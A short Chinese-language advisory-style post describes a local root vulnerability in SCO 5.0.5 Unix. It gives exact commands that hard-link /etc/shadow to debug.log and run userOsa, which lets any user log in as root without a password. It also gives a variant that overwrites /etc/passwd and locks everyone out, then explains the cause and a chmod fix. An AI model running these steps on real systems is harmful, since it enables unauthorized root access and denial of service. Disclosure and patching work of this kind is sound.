SCO5.0.5一个大漏洞

　　SCO5.0.5 Unix 有一个大BUG----任何普通用户都可以成为超级用户.

　　步骤:

　　1. 用普通用户登录到系统,然后进入一个有写权限的目录
　　2. ln /etc/shadow debug.log (硬连接)
　　3. 执行/etc/sysadm.d/bin/userOsa (O是大写的字母o)

　　操作完成之后,/etc/shadow文件被覆盖, 此时可以使用系统中的任何用户登陆系统,不用密码,包括root用户.

　　注: 如果2中改为ln /etc/passwd debug.log
　　则/etc/passwd被覆盖,谁也登录不了系统.

　　原因:
　　SCO5.0.5 Unix中/etc/sysadm.d/bin/userOsa程序在运行时会生成一个名叫debug.log的文件,这个文件用户属于root 组，而且此程序有BUG,不会检查用户权限,因此可以覆盖任何文件,包括passwd和shadow.

　　清除此漏洞:
　　用root用户登录,到/etc/sysadm.d/bin下执,行chmod o-x userOsa即可

　　此漏洞只在SCO5.0.5 unix存在, SCO5.0.6 unix或更高版本不存在.